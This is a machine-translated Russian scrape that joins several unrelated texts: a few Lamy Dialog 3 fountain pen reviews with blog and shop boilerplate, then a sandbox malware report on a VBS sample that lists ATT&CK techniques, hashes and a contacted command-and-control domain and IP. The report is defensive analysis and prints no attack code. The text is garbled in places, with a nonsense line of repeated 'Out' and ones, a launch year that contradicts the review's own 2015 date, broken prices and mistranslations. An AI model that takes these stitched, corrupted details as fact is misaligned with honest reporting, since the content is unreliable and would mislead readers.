Ищете быстрого(неплохого) блокнота с прочной кожей? Dialog 3 будет соответствовать всем требованиям… но также подойдут Pilot VP, Karas Kustoms Ink или Fountain K, которые намного дешевле.

После удобного компаньона по написанию писем? Пропустите это, если только вы не тренируете вес запястья для соревнований «Самый сильный человек в мире».

Хотите, чтобы любовник шестнадцатого века исполнил вам серенаду на балконе в итальянском стиле? Неаааа, Lamy Dialog 3 тоже этого не сделает, к сожалению.

Что вы думаете о Lamy Dialog 3? А какая ручка у твоего Ромео или Джульетты?

Держите эти перья грязными!

О’Ромео, Ромео, зачем ты, Ромео?

Нравится:

Нравится Загрузка. ..

Обзор перьевой ручки Lamy Dialog 3 Piano Black – ручки Goldspot

Подпишитесь на нашу рассылку, чтобы получать оповещения о новых продуктах, специальные предложения и коды купонов.

Введите адрес электронной почты
  • Том
  • 3 августа 2015 г.
  1. Дом
  2. Журнал
  3. Обзор перьевой ручки Lamy Dialog 3 Piano Black


The Dialog — это топовый бренд Lamy. Придерживаясь принципов движения Баухаус, Dialog 3 имеет минималистский профиль и этику дизайна, ориентированную на функциональность. Первоначально выпущенная в 2012 году и разработанная Франко Кливио, Dialog — единственная выдвижная перьевая ручка Lamy с одним из самых сложных механизмов и самыми гладкими пишущими наконечниками.

В этом обзоре мы рассмотрим все дизайны Dialog 3, включая лакированные цвета Piano Black и Piano White, которые были предметом видео.

Слева: Lamy Dialog 3 Piano Black, справа: Lamy Dialog 3 Matte Black

 

Покрытия Palladium и Matte Black были частью первоначального производства ручек Dialog 3, представленных в 2021 году. В 2015 году лаковые покрытия Piano Black и Piano White придали полированный вид цилиндрическому профилю.

Помимо очевидной разницы в отделке ручки, коробка для презентации была изменена с тонкой деревянной коробки на более объемный футляр. Как вы можете видеть в нашем видеообзоре, Piano Black/White гораздо более впечатляющий и грандиозный. Тонкая деревянная коробочка с оригинальной Dialog 3, на мой взгляд, также имеет место быть в качестве удобного настольного держателя для вашей авторучки.

Original Lamy Dialog 3 Matte Black с твердым пером

 

Piano Black/White Dialog 3 также различаются по типу пера. Продолговатый вырез сбоку устройства позволяет увидеть уровень чернил в картридже или преобразователе. Оригинальный блок пера Dialog 3 на ручках Palladium и Matte Black прочный со всех сторон. Более новые модели Dialog 3 также поставляются с чистящим кольцом, которое используется для промывки и ухода за внутренней оболочкой перьевой ручки при извлечении блока пера.

Интересный факт для тех, кто уже владеет Dialog 3 и хотел бы приобрести более новую версию: перья не являются взаимозаменяемыми, так как они не совпадают, если вы пытаетесь переключаться между старой и новой моделями. Некоторых это может не беспокоить, но мне нужно, чтобы перо совпадало с зажимом. В противном случае с хрупкими неодушевленными предметами могут случиться плохие вещи.


Опыт письма от руки

Эту ручку интересно брать в руки и ерзать. Это похоже на нечто среднее между перьевой ручкой и световым мечом. Он супергладкий и обтекаемый, как бомбардировщик-невидимка. Если бы Apple делала перьевую ручку, она, вероятно, была бы похожа на Dialog 3.

Значительный вес в руке (1,6 унции) производит впечатление прочного, хорошо изготовленного инструмента. Тем не менее, он недостаточно тяжел, чтобы использовать его в качестве дубинки. Это важно, потому что у многих людей могут возникнуть проблемы с тяжелой ручкой не только потому, что она вызывает усталость рук при длительных сеансах письма, но и потому, что она будет менее заметной как настоящее оружие при попытке пройти через TSA.

Поскольку это ручка без колпачка, нет необходимости решать, писать ли с колпачком в руке или с поднятым колпачком. Длина перьевой ручки идеально подходит для большинства рук среднего или крупного размера. Равномерный обхват позволяет вам выбирать, где вы держите ручку. Те, кто знаком с Vanishing Point, могут иметь те же претензии к Dialog 3, поскольку зажим может мешать положению ваших пальцев при письме. Зажим Dialog 3 втягивается ближе к корпусу пера, когда перо полностью выдвигается, что делает его немного менее навязчивым, чем зажим VP.

Поворотный механизм Dialog 3 кажется прочным. Когда вы поворачиваете ручку, вы можете почувствовать четкий «щелчок» шарового клапана и пера, перемещающихся в нужное положение.

Макроснимок Lamy Dialog 3 M Nib с Sailor Jentle Blue-Black на бумаге Rhodia 80 г/м².


14-каратное перо Lamy из цельного золота позволяет писать с абсолютным удовольствием. Среднее перо, которое я выбрал для образцов письма, писало красивым влажным потоком и скользило по странице с каждым словом. Несмотря на то, что Piano Black имеет глянцевое лакированное покрытие, я без труда ухватился за более широкую область захвата этой перьевой ручки. Поскольку большинство перьевых ручек обычно имеют более узкую секцию для захвата, к захвату Lamy Dialog 3 нужно немного привыкнуть, особенно если вы пишете в основном тонкими ручками (например, Cross Century).

В целом, я был очень впечатлен тем, как эта ручка справляется с поворотами и реагирует на ускорение (то есть скорость рукописного ввода). Он может не отставать от быстрых писателей и тех, кто любит быть большим и смелым.

Функционально механизм шарового клапана отлично справляется с сохранением чернил на перо. Были некоторые проблемы с высыханием первых итераций Dialog 3. С тех пор Лами устранил эти недостатки в новейших моделях. За то время, что я писал этой ручкой, у меня не было проблем с запуском или пропусками из-за высыхания чернил в наконечнике. Если вы ищете быстродействующую перьевую ручку, которую можно взять с собой в дорогу, Dialog 3 — превосходное решение.

Технические характеристики Lamy Dialog 3

Длина (в закрытом виде): 5,5 дюйма
Длина (с выдвинутым наконечником): 6,125 дюйма
Ширина без зажима: 0,537 дюйма
Ширина с зажимом: 0,631 дюйма
Вес 1,6 унции

Несколько слов выбора

Резюме:

  • Качество письма: Золотое перо Lamy из 14-каратного золота очень гладкое и хорошо течет во влажном состоянии. Он легко скользит по бумаге. Вес и размер пера, хотя и достаточные, не мешают писать, а наоборот, улучшают его. (класс А)
  • Эстетическое качество: современный дизайн Dialog является воплощением «Apple-esque». Четкие линии профиля и закругленные концы излучают простоту и элегантность. (класс А+)
  • Полезность: Выдвижная перьевая ручка означает, что колпачок не нужен! Вы не можете случайно пристегнуть рубашку к ручке, когда она открыта, так как клипса убирается, когда ручка используется. Одним из минусов является то, что в ручке используются фирменные картриджи для перьевых ручек Lamy и конвертер. (класс А+)
  • Цена: 308 долларов США (цена со скидкой) — довольно высокая цена, учитывая, что перьевая ручка Lamy Studio с 14-каратным золотым пером может быть продана за половину стоимости. По сравнению с другими перьевыми ручками с выдвижным пером, Pilot Vanishing Point также вдвое дешевле. Pilot Fermo, выдвижная перьевая ручка с поворотным механизмом ($319).0,20 продажная цена / 399 долларов США в розницу) будет более сопоставимым. (сорт Б)

Итоговый класс: A
Глядя на коллекции перьевых ручек Lamy в целом, легко понять, почему Dialog 3 стоит особняком на вершине. Благодаря превосходному дизайну Dialog и механизму выдвижения пера эта ручка занимает первое место среди коллекционеров Lamy. Перо из 14-каратного золота очень гладкое и отзывчивое на странице. Хотя это одна из самых дорогих ручек Lamy на рынке, вы все равно получаете много полезности и качества за свои деньги, что является отличительной чертой философии дизайна Lamy в стиле немецкого Баухауза. Хотя Dialog 3 представляет собой предмет роскоши, он не утратил своего предназначения в качестве пишущего инструмента. Некоторым писателям может потребоваться некоторое время, чтобы привыкнуть к уникальной цилиндрической форме, но там, где ей не хватает обычного дизайна, она на 100% компенсирует полезность. Эта футуристическая ручка позволяет Lamy опережать конкурентов в дизайне ручек.

← Назад к Журнал

Введите адрес электронной почты

LAMY DIALOG 3 ПЕРЬЕВАЯ РУЧКА ОБЗОР | Блог на капсулах

Lamy Dialog 3 рядом с Lamy Pico, оба от дизайнера Franco Clivio

с небольшим с RESERANCE TO Comhout Out Out Out Out Out of 11111111111111111111111159. 9015

с небольшим семей. 3 на первый взгляд совсем не похож на перьевую ручку. Но потом, когда вы замечаете, что это просто еще одна ручка Lamy, все начинает обретать смысл. Видите ли, с годами мы привыкли ожидать от немецкого бренда уникального минимального дизайна. С другой стороны, еще одной важной особенностью ручек Lamy является их интуитивно понятная и удобная функциональность. Для меня сбалансированное сочетание этих двух вещей делает Lamy одним из моих любимых брендов.

С той же точки зрения Dialog 3 принципиально отличается от других продуктов Lamy. На этот раз кажется, что он больше сосредоточен на эстетике, принимая функциональность «как есть» … или, по крайней мере, так это кажется мне. Не то, чтобы это бесполезная, дерьмовая ручка. Но она определенно не предназначена для того, чтобы стать лучшей ручкой для повседневного использования (что будет показано далее в этом обзоре). Вместо этого он демонстрирует отличный механизм и исключительный дизайн.

Не всегда легко точно определить, почему минималистичный дизайн может быть привлекательным. Но в данном случае это, очевидно, во многом связано с чистым, футуристическим внешним видом Dialog 3. Дизайн определенно «нечто другое», далеко не обычный. На самом деле, на первый взгляд она едва ли похожа на ручку, что, вероятно, является причиной того, что она не привлекает столько внимания, как некоторые другие ручки, например, Lamy 2000.

Говоря о дизайне: Вы знаете, как мы, блоггеры, занимающиеся ручкой (обычно это довольно общее понятие), называют практически любую форму ручки «сигарообразным»? Что ж, Dialog 3, пожалуй, самая близкая вещь, которая когда-либо была похожа на настоящую сигарообразную ручку! У него прямая цилиндрическая форма без сужения и идеально круглые навершия. Кроме зажима и двух выгравированных параллельных линий вдоль корпуса ручки (с логотипом Lamy между ними рядом с задней частью ручки), больше буквально ничего нет.

Черная рояльная отделка той, что у меня есть, — одна из двух новых версий, выпущенных недавно (черная рояль и белая). Это глянцевое лаковое покрытие, которое, на мой взгляд, еще больше выделяет современный дизайн Dialog! Небольшой недостаток, который следует отметить, заключается в том, что покрытие довольно подвержено потертостям и царапинам, поэтому, если вы хотите сохранить свои ручки в первозданном состоянии, матовые версии могут быть немного более щадящими (хотя матовые покрытия также собирают потертости и царапины). царапины от использования).

Но не только другая отделка. В отличие от старой версии, которая страдала от высыхания, новая версия (матово-черная и палладиевая версии, очевидно, также получили обновление) имеет другой внутренний дизайн и немного другой металлический воротник, который немного выдвигается из корпуса, когда ручка «открыта». Эти изменения, хотя они едва заметны, по моему опыту, работают довольно хорошо. Диалог 3 у меня уже около четырех месяцев, всегда заполненный на моем столе, и он ничуть не засох. Даже после нескольких дней неиспользования пера он не выказал ни малейшего колебания и сразу же начал писать.

У Лами есть особенность клипов, которые делают особый трюк, и у Диалога 3 есть именно это. Зажим имеет ту же форму сигары, что и остальная часть ручки, и расположен довольно низко по отношению к корпусу ручки. Он подпружинен и слегка открывается, когда вы нажимаете на верхнюю часть. Это не самая функциональная клипса из-за того, как она прикреплена, но она работает, если вы действительно хотите закрепить ее на чем-то. Самое интересное в этом начинается, когда вы открываете ручку. Dialog 3 — одна из немногих ручек с поворотным механизмом (подробнее об этом позже), и когда вы выдвигаете перо, зажим немного втягивается в корпус, что затрудняет зацепление за что-либо. Он служит напоминанием закрыть перо, прежде чем убрать его.

Шаровой клапан закрывает корпус, чтобы предотвратить высыхание пера. Это одна из немногих ручек, которые не используют колпачок, что приводит к неизбежному сравнению с ее ближайшим врагом, Pilot. Точка схода: Dialog, без сомнения, получает очки стиля, но когда дело доходит до простоты использования, VP легко выигрывает. Pilot VP сделан для работы одной рукой, и это показывает, что Dialog 3 — нет. Пользоваться Диалогом одной рукой можно, но не очень удобно.

Dialog 3 — прочная и надежная ручка. Это полностью металлическая конструкция, благодаря которой вес достигает внушительных 45 граммов. Значительная ширина (1,3 см/0,5 дюйма) и длина (13,9 см/5,5 дюйма в сложенном виде) придают ручке громоздкий вид, что вместе с весом создает впечатление, что вы держите цельный кусок стали! Когда вы «открываете» ручку, Dialog 3 становится еще длиннее, в отличие от обычных ручек, которые становятся короче, когда вы снимаете колпачок. С выдвинутым пером размер диалогового окна составляет 15,6 см (6,14 дюйма), что очень много даже для такого человека, как я, который любит большие ручки.

Обновленный блок пера теперь оснащен окном для чернил

Так размер делает его неудобным в использовании? Ну да и нет. Я обнаружил, что тянусь к разным ручкам, когда знал, что придется много писать. Но на самом деле я нахожу его более удобным, чем «Точка схода». Благодаря большему диаметру клипса, в отличие от VP, не мешается, а вес в руке не мешает. Несмотря на то, что спереди назад ручка выглядит тяжелой, большая часть веса приходится на переднюю часть ручки, где находится механизм, так что на самом деле она кажется довольно сбалансированной. При этом имейте в виду, что я привык писать большими ручками, поэтому, если вы обычно придерживаетесь меньших ручек, ваш пробег может отличаться.

Я выбрал широкое перо (вы меня знаете!), которое на самом деле является первым золотым пером Lamy, за исключением 2000-го, которым я владею. Это замечательное перо, влажное и отзывчивое, гладкое, но не слишком гладкое. Тем не менее, как и перо Imporium, о котором я говорил ранее (обзор Lamy Imporium), оно предпочитает более влажные чернила. С сухими чернилами он иногда колеблется и немного пропускает, более влажные чернила решили эту проблему (я предпочитаю чернила Iroshizuku или Lamy). Как я уже сказал, новый и улучшенный механизм, кажется, помогает предотвратить высыхание пера, поэтому, хотя в прошлом это было частой жалобой, я думаю, что Лами избавился от этого с редизайном.

Lamy Dialog 3 продается по цене около 310 евро (305 долларов США) в версии с рояльным лаком (чуть меньше за матовую отделку). Это много денег. Особенно с неизбежным сравнением между этим и Pilot VP Dialog может показаться немного дорогим. Лично мне VP не очень нравится, в основном потому, что дизайн не соответствует моему вкусу. У Dialog отличный дизайн, что лично для меня делает его достойным премиум-класса. На самом деле, если честно, Dialog 3 мне больше всего нравится своим дизайном. Как выбор EDC, VP легко побеждает. Вам придется решить для себя, к какому лагерю вы относитесь: дизайну или практичности!

Примечание. Penworld поддерживает этот блог. Я получил скидку на эту покупку, поэтому я мог написать этот отзыв. На меня никоим образом не повлияло создание этого обзора, мнения, высказанные здесь, полностью принадлежат мне! Этот обзор не содержит партнерских ссылок.

Давайте еще раз покрутим: Lamy Dialog 3

Похоже, теперь у меня есть склонность к извилистым выдвижным перьевым ручкам. Возможно, вы помните мой обзор Montblanc 1912. У меня на подходе Pilot Fermo. А вот и Lamy Dialog 3.

Перьевой эквивалент обелиска 2001 года.

Сначала скажу: это чертовски странная ручка. Нет кепки. Нет раздела. Никаких финалов или чего-то в этом роде. О, и он выдвижной, конечно.

Такая ручка могла быть только у Лами. Я не имею в виду, потому что у него характерное надеваемое перо Lamy, или потому что логотип Lamy хорошо виден сзади (да). Нет, раздача — это своего рода урезанный дух, который породил 2000 и Aion, использование металла и текстур, опора на инженерию вместо стиля. Увидев три дизайна вместе, они выглядят как дома.

Один из семьи.

Но давайте разберемся с некоторыми вещами.

Это дорогая ручка по меркам Lamy (хотя и не по сравнению с Montblanc, а?). Только Импориум дороже. Я получил свой в матово-черном цвете от Iguanasell за оттенок менее 200 фунтов стерлингов; вы можете получить его в матовом серебристом цвете по той же цене, или в глянцевом черном или глянцевом белом цвете за немного большую цену. Сравните это с моделью 2000 года: у меня была хорошая сделка, и я заплатил за нее менее 100 фунтов стерлингов; обычно он продается по цене около 130 фунтов стерлингов. Это должно дать вам некоторый контекст.

Это также огромная, колоссальная ручка (поэтому я выбрала черную… она стройнит, правда?). Посмотрите, как он убирается рядом с ручками с колпачками, и он не выглядит чем-то особенным. Но, в отличие от других ручек, она не становится короче, когда готова писать: она становится длиннее. И он сделан из металла, и он тяжелый. Раздела нет: берешься за ствол, он широкий. Для такого парня, как я, который не расставляет ручки, поначалу писать с помощью Dialog было все равно, что размахивать фонарным столбом.

Что за зверь.

Распакуйте Диалог и немного похихикайте. Он огромен и в значительной степени лишен особенностей. Как отметили другие рецензенты, в то время как другие ручки напоминают сигару , это настоящая сигара, выполненная из алюминия. На самом деле это сигара , туба . Атласное покрытие алюминия заставляет ручку петь, когда вы проводите по ней пальцами. Две параллельные линии ведут к логотипу Lamy.

Параллельные линии указывают правильное втянутое положение.

Логотип слегка выгравирован.

Зажим выделяется на фоне черного. Он шарнирный, как и другие зажимы Lamy, но только слегка. Мне было трудно им пользоваться, но я все равно никогда не обрезаю ручки. Мой тоже немного покачивается из стороны в сторону, что, к сожалению, очень заметно из-за параллельных линий, расположенных рядом с клипсой…

Клипса минималистична.

Выдвижение пера приводит к тому, что клипса слегка углубляется в ствол, что является хитрым приемом, но совершенно бессмысленным с точки зрения удобства: клипса оказывается далеко не заподлицо со стволом. Возможно, это сделано для того, чтобы вы никогда не пристегивали его к одежде, не втянув предварительно перо?

Во всяком случае, я так и не уложился в ролике о Pilot Vanishing Point, но этот гораздо менее навязчив. Он не говорит мне, как держать перо.

Конец пера скрыт за хромированным куполом, который откидывается, когда вы активируете механизм.

Здесь выходит перо.

А вот и он, нахальный маленький мерзавец.

Механизм работает за счет скручивания двух половинок ручки. Я обнаружил, что движение возможно одной рукой, но легче двумя. Когда вы полностью вытягиваете или полностью втягиваете наконечник, появляется заметная фиксация, которая помогает вам на ощупь определить, когда вы завершили движение. Механизм кажется тяжелым, но плавным, а не мягким. Мне понравилось кататься туда-сюда.

Если убрать перо и продолжать крутить в том же направлении, задняя часть пера оторвется и обнажит преобразователь, установленный в блоке пера, как в Vanishing Point.

Здесь происходит волшебство.

Отвинтите блок пера, и он выйдет. Лами предлагает небольшую штуковину, чтобы помочь вам открыть окно пера и почистить перо, что, как мне кажется, было приятным прикосновением.

Перо напоминает мне о Vanishing Point.

Все плотно прилегает друг к другу и хорошо обработано. Мне понравилось окошко для чернил в блоке пера, чтобы можно было увидеть конвертер.

Так что насчет писательского опыта? Что ж, как только вы привыкнете к размеру и весу — а вы привыкнете — это действительно замечательно, хотя и сильно отличается от всего, что я когда-либо использовал раньше.

Чертовски толще, чем 1912.

Груз расположен спереди, так что вы можете позволить ручке писать. Сатиновая отделка означает, что вам не нужно беспокоиться о скольжении.

Конец дела. Я думаю, что это выглядело бы лучше с изогнутым пером от Aion.

Я впервые использую одно из золотых перьев Lamy Z55, и оно совершенно особенное. Там гораздо больше мягкости и отскока, чем я ожидал. Я нашел вариацию линии без особых усилий.

Симпатичный перо, в каком-то смысле суровый.

Под лупу перо идеально обработано и выровнено. Это тоже красиво, с золотой полосой, идущей по центральной щели. По бумаге он бежит очень гладко и мокро. Я выбрал штраф, и я бы сказал, что он больше подходит для средних.

Золото — единственная немонохромная вещь на всей ручке.

После того, как первоначальный шок от размера утихнет — а это шок — это невероятно приятное владение и использование ручки. Это если вам нравятся большие ручки. Dialog выглядит великолепно: стильный, современный, разработан . Она прекрасно спроектирована, как и все высококачественные ручки Lamy. И несмотря на вес, в руке сидит удобно, пишет как мечта.

Это мое мнение. Но вот что действительно показательно: вы бы видели, как загорелись глаза моего пятилетнего ребенка, когда перо вышло из торпедного аппарата. Магия.

Нравится:

Нравится Загрузка…

LAMY Dialog 3 Обзор перьевой ручки

Как ни странно, серия LAMY Dialog часто остается незамеченной, когда речь идет об узнаваемости бренда. Когда мы думаем о LAMY, мы думаем о таких вещах, как «Safari», «2000» или, может быть, даже «Studio». Диалог? Возможно нет.

Хотя серия Dialog определенно соответствует эстетике LAMY, она, вероятно, является самой уникальной и современной (почти абстрактной?) их линейкой. Это помогает им выделиться наверняка, но также может помешать потенциальным покупателям их купить; также ценник может играть роль в процессе принятия решения. .. Из коллекции они находятся в верхней части ценового диапазона для бренда в диапазоне от 130 до 385 долларов в зависимости от модели.

Ниже приведено изображение сериала с веб-сайта LAMY:

Больше всего мне понравилась Dialog 3, перьевая ручка серии. Что делает его наиболее интересным, так это то, что это выдвижная перьевая ручка. Вспомните Pilot Capless или Vanishing Point, но с очень отчетливым чутьем в стиле LAMY.

Как и должно быть, Dialog 3 поставляется в довольно красивой упаковке. Сначала вас встречает матово-черная толстая крафт-коробка с глянцевым логотипом «LAMY», выгравированным на верхней части, в которой вы найдете маленькую деревянную капсулу-раскладушку, гладкую и тонкую. Сначала он почти не выглядит достаточно большим, чтобы вместить перьевую ручку хорошего размера. Удерживаемая магнитами, после открытия ручка лежит в гладких каналах (без обивки), а внутренняя часть украшена названием модели и дизайнером.

Классно, я думаю. Определенно не одноразовая упаковка.

Первое, что бросается в глаза при извлечении ручки, это ее размер. Без сомнения, это большая ручка. С точки зрения размеров, по длине он недалеко от LAMY 2000, но благодаря форме, весу и материалу он кажется намного больше.

Ствол не имеет сужения, так как по форме больше напоминает сигару. Концы закругляются, но на самом деле это не влияет на общее владение ручкой. Диаметр, вероятно, близок к 9./16″, что без какого-либо сужения к рукоятке может быть довольно большим для некоторых людей.

С точки зрения дизайна, я должен признать, что общий вид пера не особо напрягает меня. Странно с моей стороны покупать ручка, в которую я не совсем влюблен из-за внешнего вида, но, может быть, это урок жизни?…  Не всегда можно отличить ручку по ее обложке, верно? Меня больше заинтриговала функциональность выдвижной механизм и хотел посмотреть, как он работает, и сравнить его с другими механизмами в своем роде.   

Вся ручка сделана в основном (если не полностью) из металла. Из-за сборки ручка весит около 47 граммов. Для сравнения, LAMY 2000 из нержавеющей стали весит 55 грамм, что немного тяжелее, а Makrolon 2000 весит около 27 граммов при нанесении чернил.

Все это говорит о том, что писать ручкой не так уж и приятно? На мой взгляд, нет, но, вероятно, не для действительно длительных периодов написания. Для написания коротких писем или ежедневных заметок это прекрасно, и мне очень, очень нравится пользоваться ручкой.

Конечно, Dialog 3 — самая дорогая модель из серии (не поэтому я так к ней привязался…), ее розничная цена составляет 385 долларов, но я смог купить свою в Pen Chalet с скидка. У Рона есть действующий промо-код CLICKYPOST, который позволяет сэкономить 10 % на покупке и может довести стоимость Dialog до уровня менее 300 долларов США. Кража? Посмотрим….

Говоря о «стали», перо Dialog 3 на самом деле из 14-каратного золота. Это та же форма пера, что и у Safari, Al Star, cp1 и других, но из двухцветного золота. Честно говоря, это была одна из основных функций, которые я надеялся испытать с ручкой, поскольку мне было интересно посмотреть, как качество письма улучшилось (или улучшилось) с переходом на золото.

Мои мысли: Мне нравится это перо. Я купил тонкое перо, которое отлично подходит для повседневного письма, а золотое перо превосходно работает сразу после покупки. Я покрасил его Sailor Jentle blue , и дальше все было гладко (плохой каламбур). Гладкость и плавность пера меня действительно удивили. Я ожидал, что будет хорошо, но не настолько. Я предпочитаю немного более влажное письмо, и это перо работает. Когда перо оставляет немного влажных чернил на буквах, чтобы они высохли, это мое любимое место. Не уверен, что я бы назвал его гладким, как стекло, но у него определенно очень мало обратной связи.

Вес пера позволяет вам писать пером, не беспокоясь о том, что «я слишком сильно нажимаю», так как перо сохраняет хорошее постоянное давление на страницу.

Ходил слух, что Dialog 3 сильно высыхает, как после одного дня простоя. Мой опыт? Совсем не тот случай. Я думаю, что эта ручка у меня уже больше месяца, и я намеренно ждал, чтобы опубликовать обзор, чтобы дать ей несколько шансов потерпеть неудачу со мной, и это не так. Разве это развенчивает миф для других? Вероятно, нет, но у меня не было ничего, кроме отличного запуска каждый раз, даже после того, как он простоял несколько дней или почти неделю.

У меня есть теория: механизм для удлинения пера представляет собой поворотную версию. В центре ствола имеется пролом, который при вращении против часовой стрелки выдавливал перо. Это довольно приятная вещь, но, в отличие от нажатия/выключения точки схода, Dialog 3 не закрывается так легко. Вы должны убедиться, что механизм полностью убран, а маленькая дверца закрыта, но есть небольшое право на ошибку. Если оставить его слегка приоткрытым, он, конечно, может высохнуть, но, возможно, это совсем не тот опыт, который видят другие. Я хотел бы услышать больше отзывов от тех, кто видел эту проблему со своей ручкой?

В целом, какие у меня ощущения от Dialog 3? Теплый и пушистый? Так-так?

Я знаю, что мне нравится ручка, и я постоянно хватаюсь за нее с тех пор, как купил ее. Писательский опыт для меня был фантастическим, и мне очень нравится прикладывать перо к бумаге.

Недостатки? Цена за штуку. Не уверен, что когда-нибудь смогу сказать, что считаю Dialog 3 полностью оправдавшим себя розничным ценником. Диапазон 250 долларов? Я бы сказал так. Чтобы получить ценность от пера по полной цене, вам действительно нужно больше наслаждаться общей эстетикой, чем функциональностью. По сравнению с выдвижной перьевой ручкой, Vanishing Point действительно стоит около 140 долларов за свою функцию. По моему скромному мнению, ни одна из этих двух ручек не является супер-сексуальной, но мы используем их, потому что они одновременно функциональны и очень круты. Выдвижные перьевые ручки!

Во-вторых, размер ручки. Учитывая размер, длину и вес, не уверен, что эта ручка подойдет для людей с крошечными руками. Кроме того, это не очень удобно для кармана рубашки, так как это похоже на длинную пачку десятицентовиков.

Несмотря на недостатки, я все равно рад, что купил ручку. У него есть свое место и цель в моей коллекции, и я знаю, что буду использовать его часто. Если вы хотите купить один из них, определенно стоит подумать.

Как было сказано выше, я забрал свой с Pen Chalet , который имеет справедливую цену, учитывая, что он может стать отличным выбором, если вы находитесь на рынке.

  

Бесплатная служба автоматизированного анализа вредоносного ПО на основе Falcon Sandbox

Этот веб-сайт использует файлы cookie для улучшения вашего просмотра. Обратите внимание, что, продолжая использовать этот сайт, вы соглашаетесь с условиями нашей Политики защиты данных.

MSG_284661.vbs

Этот отчет создан на основе файла или URL-адреса, отправленного в эту веб-службу 6 марта 2020 г. 19:10:24 (UTC)
Гостевая система: Windows 7, 64-разрядная, Профессиональная, 6.1 (сборка 7601), Пакет обновления 1
Создан отчет по Falcon Sandbox v8. 30 © Гибридный анализ

Обзор Образец недоступен

Повторный анализ Хэш, увиденный ранее Показать похожие образцы Запросить удаление отчета

Реагирование на инцидент

Оценка риска

Поведение сети
Контакты 1 домен и 2 хоста. Посмотреть все детали

Методы обнаружения MITRE ATT&CK™

В этом отчете есть 6 индикаторов, которые были сопоставлены с 9 техниками атаки и 5 тактиками. Посмотреть все детали

Исполнение
Т1047 Инструментарий управления Windows
  • Исполнение
Инструментарий управления Windows (WMI) — это функция администрирования Windows, которая обеспечивает единую среду для локального и удаленного доступа к системным компонентам Windows. Узнать больше
  • Запускает узел поставщика WMI
Т1168 Локальное планирование заданий
  • Исполнение
  • Стойкость
В системах Linux и Apple поддерживается несколько методов для создания заранее запланированных и периодических фоновых заданий: cron, Die. Узнать больше
  • Загружает COM API планировщика задач
Постоянство
Т1179 Зацеп
  • Доступ к учетным данным
  • Стойкость
  • Повышение привилегий
Процессы Windows часто используют функции интерфейса прикладного программирования (API) для выполнения задач, требующих многократного использования системных ресурсов. Узнать больше
  • Устанавливает хуки/патчи запущенного процесса
Т1215 Модули ядра и расширения
  • Постоянство
Загружаемые модули ядра (или LKM) — это фрагменты кода, которые можно загружать и выгружать в ядро ​​по запросу. Узнать больше
  • Ссылается на подозрительные системные модули
Т1168 Локальное планирование заданий
  • Исполнение
  • Стойкость
В системах Linux и Apple поддерживается несколько методов для создания заранее запланированных и периодических фоновых заданий: cron, Die. Узнать больше
  • Загружает COM API планировщика задач
Повышение привилегий
Т1179 Зацеп
  • Доступ к учетным данным
  • Стойкость
  • Повышение привилегий
Процессы Windows часто используют функции интерфейса прикладного программирования (API) для выполнения задач, требующих многократного использования системных ресурсов. Узнать больше
  • Устанавливает хуки/патчи запущенного процесса
Доступ к учетным данным
Т1179 Зацеп
  • Доступ к учетным данным
  • Стойкость
  • Повышение привилегий
Процессы Windows часто используют функции интерфейса прикладного программирования (API) для выполнения задач, требующих многократного использования системных ресурсов. Узнать больше
  • Устанавливает хуки/патчи запущенного процесса
Командование и управление
Т1132 Кодирование данных
  • Командование и управление
Информация управления и контроля (C2) кодируется с использованием стандартной системы кодирования данных. Узнать больше
  • HTTP-запрос содержит артефакты в кодировке Base64.
Т1094 Пользовательский протокол управления и контроля
  • Командование и управление
Злоумышленники могут взаимодействовать, используя собственный протокол управления и контроля вместо использования существующего [[Technique/T1071|Стандартный протокол прикладного уровня]] для инкапсуляции команд. Узнать больше
  • Содержит индикаторы команд общения с ботом

Индикаторы

Детали файла

Все детали:

MSG_284661.
vbs

Имя файла
MSG_284661.vbs
Размер
5,3 МБ (5577704 байта)
Тип
скрипт vbs
Описание
Текст ASCII с очень длинными строками
Архитектура
WINDOWS
SHA256
5b921027862218b03237ff14af5c83d141f0f0637413250ac48c133264aca7cc
cc
MD5
0D3C44A13DF2141B9D3CE6CD168E21FB
SHA1
BB97DA2C3DFCAF4B775CF14B78AIEE
49152:MbuwNJl9oe4ue9yEcieJ2nkk3vwfhnwh3T4FWhUkYHSuxmoMppfhclaCZCAvpCW3:n

Скриншоты

Загрузка контента, пожалуйста, подождите. ..

Гибридный анализ

Совет: Щелкните проанализированный процесс ниже, чтобы просмотреть дополнительные сведения.

Всего проанализировано 2 процесса.

  • wscript.exe «C:\MSG_284661.vbs» (ПИД-код: 4000)
    • WmiPrvSE. exe (ИД: 3764)

Зарегистрированные вызовы сценариев Зарегистрированный стандартный вывод Извлеченные потоки Дампы памяти
Ограниченный мониторинг Сетевая активность Ошибка сети Мультискан Матч

Сетевой анализ

Запросы DNS

Войти для загрузки Запросы DNS (CSV)

Домен Адрес Регистратор Страна
tiswii. com
OSINT

Связанные артефакты для tiswii.com

Поле Whois Значение
Адрес 96 Моват Авеню
Город Торонто
Страна СА
Дата создания Вт, 26 марта 2019 г. 21:36:37 GMT
DNSSEC без знака
Имя домена TISWII.COM
Электронная почта [email protected]
Электронная почта [email protected]
Срок годности Чт, 26 марта 2020 г., 21:36:37 GMT
Сервер имен NS1.DIGITALOCEAN.COM
Сервер имен NS2. DIGITALOCEAN.COM
Организация Связаться с клиентом Privacy Inc. 1244218110
Регистрационный номер ООО «Гугл»
Государственный НА
Статус clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Статус clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Последнее обновление Сб, 31 августа 2019 г. 14:44:53 GMT
Whois-сервер whois.google.com
Почтовый индекс М4К 3К1

167.99.251.92
ТТЛ: 1442
ООО «Гугл»
Организация: Contact Privacy Inc. Заказчик 1244218110
Сервер имен: NS1.DIGITALOCEAN.COM
Дата создания: вторник, 26 марта 2019 г., 21:36:37 по Гринвичу
США

HTTP-трафик

Конечная точка Запрос URL-адрес Данные
